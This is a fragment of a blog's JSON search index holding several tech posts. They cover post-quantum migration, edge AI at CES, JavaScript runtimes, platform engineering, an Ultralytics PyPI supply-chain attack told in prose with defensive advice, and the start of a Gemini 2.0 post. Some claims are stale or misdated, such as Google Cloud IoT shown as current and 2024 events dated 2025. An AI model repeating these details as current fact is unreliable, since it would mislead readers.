languages coexist with established ones. The idea that the kernel will ever be fully rewritten in Rust is fantasy, and nobody serious is proposing it.\nWhat I find most valuable isn\u0026rsquo;t the language itself but the conversation it\u0026rsquo;s forcing. Every time a Rust abstraction needs to encode a kernel invariant in the type system, it makes that invariant explicit. Even if you never write a line of Rust, the process of defining safe interfaces improves understanding of the existing C code.\nFor those of us building systems on top of the kernel, the practical impact is still minimal. But if you\u0026rsquo;re writing kernel modules or embedded drivers, learning Rust\u0026rsquo;s ownership model is a worthwhile investment. The direction is clear, even if the timeline isn\u0026rsquo;t.\nMore on language and ecosystem evolution in my Developer Landscape series.\n","date":"22 January 2026","externalUrl":null,"permalink":"/posts/260122-rust-linux-kernel-progress/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Rust’s integration into the Linux kernel has moved beyond proof of concept into real subsystems, but the cultural and technical challenges remain fascinating.","title":"Rust in the Linux Kernel — Two Years of Growing Pains and Real Progress","type":"posts"},{"content":" Overview # Security isn\u0026rsquo;t just about incident response—it\u0026rsquo;s about building resilient systems, staying ahead of evolving threats, and integrating security into the development process. This series covers the broader cybersecurity ecosystem: threat trends and attacker sophistication, defensive strategies that work, emerging security tools, and how organizations are shifting from reactive security to proactive risk management.\nWhether you\u0026rsquo;re a developer, architect, or security professional, understanding these trends is essential for building production systems.\nWhat You\u0026rsquo;ll Find Here # Threat Intelligence: Understanding attacker categories (cybercriminals, nation-states, activists), their capabilities, and how they\u0026rsquo;re adapting to defensive innovations.\nDetection \u0026amp; Prevention: Modern security tooling—SIEM, EDR, threat intelligence platforms, and how to detect attacks before they cause damage.\nDefense in Depth: Building security architectures that assume breaches will happen—segmentation, zero trust, incident response preparation, and resilience.\nSecurity Tooling Evolution: How DevSecOps practices, SBOM generation, dependency scanning, and automated testing shift security left into the development pipeline.\nCompliance \u0026amp; Standards: Navigating regulatory requirements, security frameworks, and audit processes while maintaining engineering velocity.\nLearning Path # Understand the threat landscape — who attacks what, why, and with what sophistication level Build detection muscle — understand how to spot attacks and what signals matter Architect defensively — principles of defense in depth, zero trust, and incident response planning Integrate security into development — how to make security a development concern, not just a compliance gate Stay current on tools — understand emerging security technologies and when they provide real value Key Topics Covered # Threat Modeling: Attack vectors, threat actors, and risk assessment methodologies Detection Methods: Log analysis, anomaly detection, behavioral analytics, and threat hunting Architectural Patterns: Network segmentation, zero trust, API security, and infrastructure hardening Development Security: Secure code review, dependency management, supply chain security, and secrets management Incident Response: Detection, containment, eradication, recovery, and post-incident analysis Compliance: SOC 2, ISO 27001, PCI DSS, HIPAA, and how to interpret compliance requirements Related Series # Explore complementary areas: Breaches \u0026amp; Zero-Days (analyzing specific incidents and lessons), Supply Chain Security (securing dependencies and build pipelines)\n","date":"15 January 2026","externalUrl":null,"permalink":"/series/cybersecurity-landscape/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Cybersecurity Landscape","type":"series"},{"content":"Last August, NIST officially published its first three post-quantum cryptography (PQC) standards: FIPS 203 (ML-KEM), FIPS 204 (ML-DSA), and FIPS 205 (SLH-DSA). What felt like an academic exercise for years is now a concrete engineering challenge. If you\u0026rsquo;re running any system that touches TLS, SSH, code signing, or certificate management — which is basically everything — the migration clock is ticking.\nI\u0026rsquo;ve been through enough cryptographic transitions in my career to know how these go. They always start slow and end in a panic. This one has the added complexity of being driven by a threat that doesn\u0026rsquo;t fully exist yet: a cryptographically relevant quantum computer. But the \u0026ldquo;harvest now, decrypt later\u0026rdquo; attack vector makes waiting a genuinely bad strategy.\nWhat Changed in Practice # The finalization of these standards means that vendors can now ship implementations without worrying about algorithm changes. OpenSSL 3.5 is expected to include ML-KEM support, and several cloud providers have already started offering PQC key agreement in their TLS implementations. Google has been running hybrid post-quantum key exchange in Chrome since 2024, and the latest data suggests the performance overhead is minimal for most use cases.\nThe real shift, though, is organizational. The U.S. government\u0026rsquo;s National Cybersecurity Strategy set a 2035 deadline for migrating federal systems to quantum-resistant cryptography. That sounds far away until you realize how many systems need to be inventoried, tested, and migrated. For anyone who\u0026rsquo;s dealt with the TLS 1.0/1.1 deprecation — which took the better part of a decade — you know that ten years isn\u0026rsquo;t as long as it sounds.\nThe Inventory Problem # Before you can migrate anything, you need to know what you have. This is where most organizations will stumble. Cryptographic agility — the ability to swap out algorithms without rewriting applications — has been a best practice for years, but in my experience, very few teams have actually implemented it properly.\nThe first step is a cryptographic inventory: every certificate, every key, every hardcoded algorithm reference in your codebase. Tools like IBM\u0026rsquo;s Quantum Safe Explorer and open-source projects like Cryptography Bill of Materials (CBOM) are emerging to help with this, but the reality is that most organizations have cryptographic dependencies buried in layers of abstraction they\u0026rsquo;ve never needed to think about.\nI spent some time last week auditing one of our internal services. What should have been a straightforward exercise turned into a rabbit hole of transitive dependencies. A library we use for JWT validation depends on a specific key type that has no post-quantum equivalent yet. Multiply that by every service in a typical microservices architecture, and you start to see the scale of the problem.\nHybrid Approaches and Transition Strategies # The consensus in the security community is that hybrid key exchange — combining a classical algorithm (like X25519) with a post-quantum one (like ML-KEM-768) — is the right transitional approach. This gives you quantum resistance while maintaining a fallback if any issues are discovered in the new algorithms.\nCloudflare published excellent data on their hybrid PQC deployment showing that the additional handshake overhead is roughly 1KB and a few hundred microseconds. For most web applications, that\u0026rsquo;s negligible. But for constrained environments — IoT devices, embedded systems, real-time protocols — the picture is more complicated.\nThe key size increase is the real concern for constrained devices. ML-KEM-768 public keys are 1,184 bytes compared to 32 bytes for X25519. For a device doing thousands of handshakes per second, that memory and bandwidth overhead adds up. This is an area where I expect we\u0026rsquo;ll see significant innovation over the next few years.\nWhat Should You Do Now? # If you\u0026rsquo;re a platform or infrastructure engineer, start with the inventory. You can\u0026rsquo;t plan a migration you can\u0026rsquo;t measure. Run your dependency scanners with crypto-aware rules, catalog your certificate infrastructure, and identify your most critical data flows.\nIf you\u0026rsquo;re building new systems, design for cryptographic agility from day one. Abstract your crypto operations behind interfaces that can be swapped without application changes. Use libraries that already support PQC algorithms — BoringSSL, liboqs, and PQClean all have usable implementations.\nIf you\u0026rsquo;re in a regulated industry — finance, healthcare, government — check your compliance frameworks. Several are already being updated to require PQC migration plans, and having a documented strategy will be expected sooner than you think.\nMy Take # I\u0026rsquo;ll be honest: the quantum threat timeline is uncertain, and there\u0026rsquo;s a real risk of premature optimization here. But the cost of starting the inventory and planning now is low compared to the cost of a rushed migration later. The organizations that handled the SHA-1 deprecation and TLS 1.2 migration smoothly were the ones that started early and moved methodically.\nThe worst outcome isn\u0026rsquo;t starting too early — it\u0026rsquo;s discovering in 2030 that your core banking system has hardcoded RSA-2048 in a library that hasn\u0026rsquo;t been maintained since 2019. Start the audit now. Future you will be grateful.\nThis is part of my ongoing Security in Practice series, where I dig into the security challenges that actually affect working engineers.\n","date":"15 January 2026","externalUrl":null,"permalink":"/posts/260115-nist-post-quantum-crypto-migration/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NIST’s post-quantum cryptography standards are finalized, and the migration timeline is no longer theoretical — it’s operational.","title":"Post-Quantum Cryptography — The Migration Clock Is Ticking","type":"posts"},{"content":"CES 2026 kicked off this week in Las Vegas, and while the show floor is always a spectacle of concept gadgets and futuristic prototypes, the real story this year is happening in the less glamorous corners of the convention center — where chip manufacturers, IoT platform vendors, and edge computing companies are quietly reshaping how we think about deploying intelligence.\nThe Edge AI Moment # The dominant theme at CES this year is unmistakable: AI is moving to the edge. After years of cloud-centric AI architectures where every inference required a round trip to a data center, the hardware has finally caught up with the ambition of running sophisticated models locally.\nNVIDIA\u0026rsquo;s announcements around their next-generation embedded platforms continue to push the boundaries of what\u0026rsquo;s possible in power-constrained environments. The ability to run multi-billion parameter models on devices consuming single-digit watts opens up applications that were simply impractical with cloud-dependent architectures.\nQualcomm is making similar moves with their Snapdragon platforms, targeting everything from smartphones to industrial IoT gateways. Their pitch is compelling: why send sensitive sensor data to the cloud for processing when you can run inference locally with lower latency, better privacy, and reduced bandwidth costs?\nIntel\u0026rsquo;s continued investment in their edge AI portfolio, particularly around the OpenVINO toolkit, is providing developers with a more vendor-neutral path to edge deployment. The ability to optimize and deploy models across CPUs, GPUs, and dedicated NPUs with a consistent API is exactly the kind of abstraction layer the ecosystem needs.\nWhy This Matters for Developers # If you\u0026rsquo;re building IoT systems or any application that processes data from physical sensors, the shift to edge AI changes your architecture fundamentally. The traditional pattern — collect data at the edge, ship it to the cloud, process it, send results back — is being replaced by a model where the edge device handles the intelligence and only sends relevant insights upstream.\nThis has cascading implications. Network bandwidth requirements drop dramatically when you\u0026rsquo;re sending processed events rather than raw sensor streams. Latency-sensitive applications — industrial automation, autonomous vehicles, real-time quality inspection — become viable in environments with unreliable connectivity. And privacy regulations like GDPR become easier to comply with when personal data never leaves the device.\nFrom a development perspective, the challenge shifts from \u0026ldquo;how do I build a scalable cloud inference pipeline\u0026rdquo; to \u0026ldquo;how do I optimize a model to run within the constraints of an edge device.\u0026rdquo; Model compression techniques — quantization, pruning, knowledge distillation — become essential skills. Frameworks like TensorFlow Lite, ONNX Runtime, and PyTorch Mobile are the tools of the trade.\nI\u0026rsquo;ve been working with edge deployment for several IoT projects over the past year, and the tooling has improved remarkably. What used to require deep expertise in model optimization and hardware-specific tuning can now be accomplished with relatively straightforward workflows. The gap between training a model in the cloud and deploying it on an edge device has narrowed considerably.\nThe IoT Platform Evolution # Beyond the AI silicon, CES 2026 is showcasing the maturation of IoT platforms that tie edge devices into coherent systems. AWS IoT Greengrass, Azure IoT Edge, and Google\u0026rsquo;s Cloud IoT offerings have all evolved to support local ML inference as a first-class capability.\nThe Matter protocol continues its slow but steady march toward becoming the universal connectivity standard for smart home devices. After a rocky initial launch, the interoperability improvements in Matter 1.3 and beyond are making it a more practical choice. The promise of buying any Matter-compatible device and having it work with any Matter-compatible platform is gradually becoming reality.\nWhat\u0026rsquo;s more interesting from an industrial perspective is the convergence of OT (operational technology) and IT systems. Edge AI gateways that can speak both industrial protocols (Modbus, OPC UA, MQTT) and cloud APIs are bridging a gap that has frustrated manufacturing and process industries for decades. Being able to deploy a machine learning model for predictive maintenance that reads directly from PLCs and publishes insights to a cloud dashboard — that\u0026rsquo;s genuinely transformative for industries that have been underserved by the software revolution.\nThe Developer Toolkit Gap # Despite the hardware advances, there\u0026rsquo;s still a significant gap in the developer experience for edge AI and IoT. Building, testing, and deploying models to heterogeneous edge devices remains harder than it should be.\nThe simulation and testing story is particularly weak. How do you test an edge AI model that\u0026rsquo;s designed to process input from a specific industrial camera in a specific lighting environment? Cloud-based development workflows don\u0026rsquo;t translate well to edge scenarios where hardware-in-the-loop testing is often necessary.\nDevOps practices for edge fleets are also immature compared to cloud-native workflows. Updating models and firmware across thousands of distributed devices with varying connectivity, managing rollbacks when updates fail, and monitoring device health at scale — these are hard problems that don\u0026rsquo;t have standardized solutions yet.\nI expect this developer experience gap to be a major focus of investment over the next couple of years. The hardware is ready, the models are capable, but the developer workflow needs to catch up.\nMy Take # CES always requires a filter — separating the genuinely significant from the merely flashy. This year, the signal is clear: edge AI has crossed the threshold from \u0026ldquo;interesting research\u0026rdquo; to \u0026ldquo;production-ready technology.\u0026rdquo;\nFor those of us who\u0026rsquo;ve been building IoT systems, this is the moment we\u0026rsquo;ve been waiting for. The ability to deploy real intelligence at the edge, without depending on cloud connectivity or accepting the latency penalties of round-trip inference, opens up applications that were previously impractical.\nMy advice: if you\u0026rsquo;re working in IoT or any domain that involves processing physical-world data, start investing in edge AI skills now. Learn model optimization, understand the hardware landscape, and experiment with edge deployment frameworks. The architectural patterns that emerge from this shift will define the next generation of intelligent systems, and the developers who understand both the AI and the edge constraints will be in tremendous demand.\nThe quiet revolution is well underway. CES 2026 just made it a little louder.\n","date":"8 January 2026","externalUrl":null,"permalink":"/posts/260108-ces-2026-edge-ai-iot/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CES 2026 opens with edge AI and IoT taking center stage, signaling a shift from cloud-first to edge-first architectures.","title":"CES 2026 — Edge AI and the Quiet Revolution in IoT","type":"posts"},{"content":"","date":"8 January 2026","externalUrl":null,"permalink":"/categories/iot/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"IoT","type":"categories"},{"content":"Happy New Year. While most sensible people are recovering from last night\u0026rsquo;s celebrations, I\u0026rsquo;m doing what I always do on January 1st — thinking about the year ahead and taking stock of where the tools I rely on daily are heading. And few areas have seen as much productive competition recently as the JavaScript runtime space.\nThe State of Node.js # Node.js remains the backbone of server-side JavaScript, and the project had a strong 2025. Node.js 22 became the active LTS release in October, bringing several features that address long-standing pain points.\nThe built-in test runner, first introduced experimentally in Node 18, has matured considerably. It\u0026rsquo;s not going to replace Jest or Vitest for complex testing scenarios, but for straightforward unit testing without the overhead of a test framework dependency, it\u0026rsquo;s remarkably capable. I\u0026rsquo;ve started using it for utility libraries and internal tools, and the reduction in devDependencies is refreshing.\nThe --experimental-strip-types flag, which allows running TypeScript files directly by stripping type annotations, is perhaps the most significant quality-of-life improvement in recent memory. While it doesn\u0026rsquo;t perform type checking (you still need tsc for that), the ability to run .ts files without a compilation step removes friction from the development workflow. For scripts, prototypes, and small services, this is a game-changer. This reflects a broader trend where runtimes are taking on more responsibility for developer experience.\nPermission model improvements continue to bring Node closer to a security-first approach. Being able to restrict file system access, network calls, and child process spawning at the runtime level is something Deno pioneered, and it\u0026rsquo;s encouraging to see Node adopting similar principles.\nDeno 2: Compatibility as Strategy # Deno 2, which launched in October 2024, represented a strategic pivot that\u0026rsquo;s paying dividends. By embracing Node.js and npm compatibility, Ryan Dahl\u0026rsquo;s runtime went from being an idealistic alternative to a practical choice for production workloads.\nThe numbers tell the story: Deno 2 can import npm packages directly, supports package.json, and works with the vast majority of the Node ecosystem without modification. The \u0026ldquo;clean break\u0026rdquo; philosophy of Deno 1 was intellectually appealing but practically limiting. Deno 2 acknowledges that the npm ecosystem is too valuable to ignore.\nFor a deeper look at where Deno is headed, I\u0026rsquo;ve covered Deno 2.3 and the runtime wars in detail, exploring how this compatibility strategy is reshaping the competitive landscape.\nWhat Deno retains from its original vision is equally important. TypeScript remains a first-class citizen — no configuration, no build step, just write TypeScript and run it. The permissions model is still the default, requiring explicit grants for file system, network, and environment access. And the built-in toolchain (formatter, linter, test runner, bundler) means you can go from zero to production with no third-party dependencies for your development workflow.\nI\u0026rsquo;ve been running a couple of internal APIs on Deno 2 for the past few months, and the experience has been positive. The cold start times are noticeably better than Node for serverless deployments, and the built-in deno serve with its multi-threaded HTTP server handles concurrent load impressively.\nBun: Speed as a Feature # Bun continues to push the performance envelope. Built on JavaScriptCore rather than V8, Oven\u0026rsquo;s runtime consistently benchmarks faster than both Node and Deno for common operations — package installation, test execution, bundling, and HTTP serving.\nA significant recent development in Bun\u0026rsquo;s evolution is the complete rewrite of its core from Zig to Rust, which demonstrates both the team\u0026rsquo;s commitment to long-term maintainability and how AI-assisted development is reshaping large-scale code modernization efforts.\nBun\u0026rsquo;s approach is maximalist: it\u0026rsquo;s a runtime, package manager, bundler, and test runner all in one binary. The package installation speed alone is enough to make you reconsider your toolchain. Running bun install on a large project and watching it complete in seconds rather than minutes is genuinely delightful.\nThe SQLite driver built into the runtime is a clever move for applications that need local persistence without the overhead of an external database. Combined with Bun\u0026rsquo;s built-in S3 client and HTML rewriter, there\u0026rsquo;s an opinionated but pragmatic approach to common web development needs.\nWhere Bun still faces challenges is ecosystem compatibility. While compatibility has improved dramatically throughout 2025, there are still edge cases where Node.js native modules or complex npm packages don\u0026rsquo;t work correctly. For greenfield projects, this is manageable. For migrating existing Node applications, it requires careful testing. Understanding your tooling ecosystem and how different runtimes support tools like linters and formatters is critical for migration planning.\nChoosing the Right Runtime # After working with all three runtimes in production over the past year, here\u0026rsquo;s my practical guidance:\nChoose Node.js when you need maximum ecosystem compatibility, have extensive existing Node infrastructure, or are working in enterprise environments where LTS support and stability are paramount. Node isn\u0026rsquo;t exciting, but it\u0026rsquo;s reliable, and in production, reliable wins. The ecosystem includes mature tooling for monitoring and observability.\nChoose Deno when you\u0026rsquo;re starting a new project, value TypeScript-first development, and want strong security defaults. The developer experience is the most polished of the three, and compatibility with npm packages means you\u0026rsquo;re not sacrificing the ecosystem. For serverless and edge computing, Deno\u0026rsquo;s performance characteristics are particularly advantageous.\nChoose Bun when performance is a primary concern, you\u0026rsquo;re building new services that can work within Bun\u0026rsquo;s compatibility boundaries, or you want the fastest possible development iteration cycle. The speed improvements are real and meaningful, especially for local development and testing workflows.\nMy Take # What I find most encouraging about the current state of JavaScript runtimes is the competitive pressure driving innovation. Node.js is adopting good ideas from Deno (permissions, TypeScript support). Deno is adopting pragmatism from the Node ecosystem (npm compatibility). Bun is pushing everyone on performance.\nThis is how healthy ecosystems evolve. Instead of a single dominant runtime growing complacent, we have three viable options that keep each other honest. Features that were experimental luxuries two years ago — native TypeScript support, built-in test runners, permission models — are now table stakes. Similar competitive dynamics are reshaping other language ecosystems as languages like Go and Python continue evolving, and systems programming advances reshape infrastructure development.\nAs someone who wrote their first Node.js application back when it was still a curiosity and callbacks were the only game in town, the sophistication of today\u0026rsquo;s JavaScript runtime ecosystem is remarkable. We\u0026rsquo;ve come from callback hell to a world where you can choose between three production-grade runtimes, each with built-in TypeScript support, modern API designs, and performance that would have seemed impossible a decade ago. This mirrors what we\u0026rsquo;re seeing across the broader developer tools landscape with .NET 9 and the evolution of developer tools ecosystems.\nThe JavaScript runtime story in 2026 is one of abundance. Choose the tool that fits your needs, and know that whichever you pick, you\u0026rsquo;re building on a solid foundation. Innovation across ecosystems ensures that tools will keep getting better.\nCross-Cluster Topics # This development hub connects to other topic clusters:\nAI + Development: GitHub Copilot Agent Mode and AI-assisted testing show how AI is reshaping how developers work Infrastructure + Development: WebAssembly components provide portable, composable application architecture. Systems programming evolution demonstrates how lower-level languages are advancing Security + Development: TanStack npm supply chain compromise and npm security lessons highlight ecosystem vulnerabilities ","date":"1 January 2026","externalUrl":null,"permalink":"/posts/260101-javascript-runtime-landscape-2026/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As we enter 2026, the JavaScript runtime ecosystem is more competitive and innovative than ever. Here’s where things stand.","title":"The Node.js Renaissance — Deno 2, Bun, and the Evolving JavaScript Runtime Landscape","type":"posts"},{"content":"It\u0026rsquo;s Christmas Day, the office is quiet, and there\u0026rsquo;s something fitting about using the downtime to reflect on where platform engineering stands as we close out 2025. This has been a transformative year for how organizations think about developer experience, infrastructure abstraction, and the relationship between platform teams and the developers they serve.\nThe Rise of the Internal Developer Platform # If 2024 was the year everyone talked about internal developer platforms (IDPs), 2025 was the year many organizations actually built them. The concept isn\u0026rsquo;t new — giving developers self-service access to infrastructure through curated abstractions has been a goal since the early days of DevOps. But the tooling has finally caught up with the ambition.\nBackstage, Spotify\u0026rsquo;s open-source developer portal, continued its march toward ubiquity. The plugin ecosystem expanded significantly this year, and I\u0026rsquo;ve seen it adopted at organizations ranging from 50-person startups to Fortune 500 enterprises. The value proposition is clear: a single pane of glass for service catalogs, documentation, CI/CD pipelines, and infrastructure provisioning.\nBut Backstage alone isn\u0026rsquo;t a platform — it\u0026rsquo;s a portal. The real work happens in the layers beneath: Crossplane for infrastructure-as-code through Kubernetes custom resources, Argo CD for GitOps deployments, and increasingly, purpose-built platform orchestrators like Kratix that handle the promise-based composition of platform capabilities.\nWhat I find encouraging is the shift from \u0026ldquo;let\u0026rsquo;s just give everyone Terraform access\u0026rdquo; to \u0026ldquo;let\u0026rsquo;s provide golden paths that embed our organization\u0026rsquo;s best practices.\u0026rdquo; Platform engineering done well means developers don\u0026rsquo;t need to understand the intricacies of VPC peering or IAM role chaining — they declare what they need, and the platform handles the how. These patterns enable the agent-based system architectures that are emerging.\nKubernetes: Still the Foundation, Less the Focus # Kubernetes itself has become almost invisible in well-run platform teams, and that\u0026rsquo;s exactly where it should be. The conversations this year haven\u0026rsquo;t been about Kubernetes — they\u0026rsquo;ve been about what runs on Kubernetes and how developers interact with it. The 1.32 release cycle demonstrated the platform\u0026rsquo;s continuing maturity, with stability and developer experience improvements as the focus.\nThe managed Kubernetes offerings from AWS (EKS), Google (GKE), and Azure (AKS) have matured to the point where the operational overhead of the control plane is negligible. The remaining complexity lives in networking (service meshes, ingress controllers), observability (the OpenTelemetry ecosystem), and multi-tenancy patterns.\nGateway API reached general availability for its core features and is steadily replacing the aging Ingress resource. If you\u0026rsquo;re still writing Ingress manifests, now is the time to migrate. Gateway API\u0026rsquo;s expressiveness and the clear separation between infrastructure provider and application developer roles make it a substantial improvement.\nI\u0026rsquo;ve spent considerable time this year helping teams adopt Cilium for eBPF-based networking, and the results have been impressive. The performance improvements over traditional iptables-based networking are meaningful, and the observability features — being able to see L7 traffic flows without sidecars — have simplified debugging significantly.\nThe Observability Stack Consolidation # One of the most notable trends of 2025 has been the consolidation around OpenTelemetry as the standard instrumentation layer. The project has reached a level of maturity where it\u0026rsquo;s no longer a question of whether to adopt it, but how quickly you can migrate from proprietary agents.\nThe tracing and metrics APIs have been stable for a while, but this year the logging signal reached stability, completing the three pillars under a single standard. For those of us who\u0026rsquo;ve spent years wiring together separate logging, metrics, and tracing pipelines with different agents, formats, and backends, this convergence is a genuine relief.\nOn the backend side, Grafana continued to strengthen its position as the visualization layer of choice, while the LGTM stack (Loki, Grafana, Tempo, Mimir) provides a compelling open-source alternative to commercial observability platforms. I\u0026rsquo;ve migrated two production environments to this stack this year, and the cost savings compared to commercial alternatives were substantial — roughly 60% reduction in observability spend.\nInfrastructure as Code: The Terraform Question # HashiCorp\u0026rsquo;s relicensing of Terraform to BSL in 2023 continues to ripple through the ecosystem. OpenTofu, the community fork, has gained significant traction this year, with several major organizations migrating their workflows. The broader supply chain and open-source security landscape has influenced how teams evaluate IaC tools. The OpenTofu 1.8 and 1.9 releases brought features that demonstrated the fork\u0026rsquo;s ability to innovate independently.\nMeanwhile, Pulumi continues to attract developers who prefer writing infrastructure in real programming languages. The appeal is obvious — why learn HCL when you can write TypeScript or Python? But I\u0026rsquo;ve found that the discipline HCL imposes — its declarative nature and limited expressiveness — is actually a feature in larger organizations. Infrastructure code that \u0026ldquo;does too much\u0026rdquo; is infrastructure code that\u0026rsquo;s hard to review and reason about.\nMy current recommendation for teams starting fresh: evaluate OpenTofu as your default, keep an eye on Pulumi for complex orchestration scenarios, and consider Crossplane if you\u0026rsquo;re already deep in the Kubernetes ecosystem. The OpenTofu fork has continued to mature and represents a solid path forward for teams looking to escape HashiCorp\u0026rsquo;s licensing constraints.\nSub-Hub: Platform Engineering \u0026amp; DevOps Practices # For detailed exploration of platform engineering patterns, from internal developer platforms to AI-assisted operations, see Platform Engineering \u0026amp; DevOps Practices — Building Developer Experience Platforms. This sub-hub connects platform engineering disciplines to infrastructure tooling, observability, and the shift toward AI-assisted operations.\nMy Take # Platform engineering in 2025 has moved from buzzword to discipline, and that\u0026rsquo;s the most encouraging development. We have real patterns, real tools, and — crucially — real failure stories to learn from.\nThe teams that have succeeded are those who treated their platform as a product, with developer experience as the primary metric. They invested in golden paths, documentation, and feedback loops. They resisted the temptation to build everything custom and instead composed existing open-source tools into coherent platforms. These teams are also investing in observability maturity from day one, recognizing that internal platforms need visibility into their own health and performance.\nThe teams that struggled were those who confused \u0026ldquo;building a platform\u0026rdquo; with \u0026ldquo;adding more YAML.\u0026rdquo; If your developers need a PhD in Kubernetes to deploy a service, your platform has failed, regardless of how elegant its architecture is. Better developer tools and AI-assisted coding continue to improve this experience.\nAs we head into 2026, I expect the focus to shift increasingly toward AI-assisted platform operations — using LLMs to help with incident response, infrastructure optimization, and developer onboarding. Cloud cost optimization and FinOps will become more critical as teams scale their platforms and need better visibility into infrastructure spending.\nLooking further ahead, distributed platform architectures will require platform teams to rethink how they deliver infrastructure abstractions across heterogeneous environments, especially as AI and autonomous systems shape operational models.\nBut that\u0026rsquo;s a topic for another post. For now, enjoy the holiday, and take a moment to appreciate how far our tooling has come. The infrastructure challenges we face today are orders of magnitude more complex than what I dealt with in the early 2000s, but our tools are orders of magnitude better too. The platform engineering discipline itself is evolving as new hardware and capabilities emerge. That\u0026rsquo;s progress worth celebrating.\n","date":"25 December 2025","externalUrl":null,"permalink":"/posts/251225-platform-engineering-2025-retrospective/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Reflecting on how platform engineering matured in 2025, from internal developer platforms to the evolution of the DevOps toolchain.","title":"Platform Engineering in 2025 — A Year-End Retrospective","type":"posts"},{"content":"If you needed a year-end reminder of why software supply chain security matters, this week delivered. The Ultralytics Python package — one of the most popular computer vision libraries with millions of monthly downloads — was compromised through a supply chain attack that injected malicious code into versions published to PyPI. This follows the pattern of earlier attacks like PyTorch Lightning malware and TanStack npm compromise that showed how critical infrastructure is vulnerable.\nThe compromised versions contained a cryptominer payload that would execute on installation, quietly consuming compute resources on developers\u0026rsquo; machines and CI/CD servers. The attack was discovered relatively quickly, and the affected versions were yanked from PyPI, but the window of exposure was enough to impact a significant number of users.\nHow It Happened # The attack vector wasn\u0026rsquo;t a direct compromise of the maintainers\u0026rsquo; credentials — it was more insidious. The attackers exploited weaknesses in the build and publish pipeline, specifically targeting the GitHub Actions workflow used to automate package publishing. By manipulating the CI/CD process, they were able to inject code into the package between the source repository and the published artifact on PyPI.\nThis is a pattern we\u0026rsquo;ve seen before, and it\u0026rsquo;s particularly concerning because it bypasses the usual trust model. Developers who pinned their dependencies, reviewed the source code on GitHub, and did everything \u0026ldquo;right\u0026rdquo; could still end up with a compromised package. The malicious code existed only in the published distribution, not in the source repository.\nThe gap between source code and distributed artifact is one of the most underappreciated attack surfaces in modern software development. We spend enormous effort on code review, static analysis, and testing, but the pipeline from \u0026ldquo;code in a repository\u0026rdquo; to \u0026ldquo;package on a registry\u0026rdquo; often runs with broad permissions and minimal verification.\nThe Broader Pattern # This isn\u0026rsquo;t an isolated incident. The Python ecosystem has seen a steady stream of supply chain attacks over the past few years. Typosquatting, dependency confusion, and compromised maintainer accounts have all been exploited. The npm ecosystem has faced similar challenges, as documented in npm supply chain security lessons. The fundamental problem is structural: package registries are built on trust, and that trust model doesn\u0026rsquo;t scale. SLSA frameworks and supply chain adoption represent the industry\u0026rsquo;s response to this systemic vulnerability.\nWhat makes the Ultralytics attack noteworthy is the target\u0026rsquo;s legitimacy and popularity. This wasn\u0026rsquo;t a typosquatted package with a similar name — this was the real, widely-used library. When a package with that level of adoption gets compromised, the blast radius is enormous. Every data science team, every computer vision project, every ML pipeline that depends on Ultralytics was potentially exposed.\nI\u0026rsquo;ve been advocating for better supply chain security practices for years, and incidents like this validate the concern. But advocacy without practical solutions is just noise. Understanding xz Utils aftermath and how the industry learned from that attack is crucial for building better defenses. So let\u0026rsquo;s talk about what actually works.\nPractical Defenses # Lock your dependencies. Use pip freeze or pip-compile to generate exact version pins with hashes. If you\u0026rsquo;re using Poetry, the lockfile includes hashes by default. Hash verification ensures that even if a package version is re-published with different contents, your install will fail rather than silently accepting the change.\nUse a private registry or proxy. Tools like Artifactory, Nexus, or even a simple devpi instance can cache and scan packages before they reach your development environments. This adds a layer of inspection between the public registry and your infrastructure.\nAudit your CI/CD permissions. The Ultralytics attack specifically targeted the publish pipeline. Review your GitHub Actions workflows — do they use permissions: to restrict token scopes? Are you using OpenID Connect (OIDC) for publishing instead of long-lived API tokens? PyPI now supports trusted publishers via OIDC, which eliminates the need for stored secrets entirely.\nMonitor for anomalies. If your CI/CD suddenly starts consuming significantly more CPU or network bandwidth, investigate. Cryptominers are noisy — they\u0026rsquo;re designed to maximize resource usage. Set up alerts on unusual resource consumption patterns.\nConsider Sigstore and package signing. The Python ecosystem is moving toward cryptographic signing of packages, and PyPI has been rolling out support for attestations. This is still early, but it\u0026rsquo;s the right direction. A signed package from a verified publisher provides a much stronger trust signal than an unsigned upload.\nThe Systemic Challenge # The deeper issue is that the open-source ecosystem\u0026rsquo;s distribution infrastructure wasn\u0026rsquo;t designed for an adversarial environment. PyPI, npm, and similar registries were built in an era when the primary concern was convenience, not security. Retrofitting security onto these systems is difficult but essential.\nInitiatives like OpenSSF and the Supply chain Levels for Software Artifacts (SLSA) framework are working on this problem at a structural level. SLSA provides a maturity model for supply chain security, from basic source integrity through to hermetic, reproducible builds. Getting the Python ecosystem to SLSA Level 3 or 4 would make attacks like this significantly harder, though we\u0026rsquo;re a long way from that being universal.\nMy Take # Every time one of these attacks hits, the conversation follows the same pattern: alarm, followed by recommendations, followed by a slow return to the status quo. I\u0026rsquo;d love to say this time will be different, but I\u0026rsquo;ve been in this industry long enough to know better.\nWhat I can say is that the tools for defending against supply chain attacks are better than they\u0026rsquo;ve ever been. Hash pinning, OIDC publishing, package attestations, and private registries are all available today. The barrier isn\u0026rsquo;t technology — it\u0026rsquo;s adoption.\nIf this incident prompts your team to add hash verification to your requirements files and audit your CI/CD permissions, then something good came from it. Security is ultimately about making the attacker\u0026rsquo;s job harder, one improvement at a time. Don\u0026rsquo;t let this week\u0026rsquo;s lesson go to waste.\n","date":"18 December 2025","externalUrl":null,"permalink":"/posts/251218-ultralytics-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A supply chain attack on the popular Ultralytics YOLO package highlights the persistent vulnerability of the Python ecosystem’s distribution pipeline.","title":"Ultralytics Supply Chain Attack — When Your Dependencies Bite Back","type":"posts"},{"content":"Google just dropped Gemini 2.0, and after spending the better part of today reading through the technical details, I think this deserves more than the usual \u0026ldquo;new model drops\u0026rdquo; fanfare. This isn\u0026rsquo;t just an incremental bump — it\u0026rsquo;s a fundamental shift in how Google is positioning its AI platform for developers.\nWhat Makes 2.0 Different # The headline feature is what Google calls \u0026ldquo;native multimodal output.\u0026rdquo; While previous Gemini versions could understand images, audio, and video as inputs, 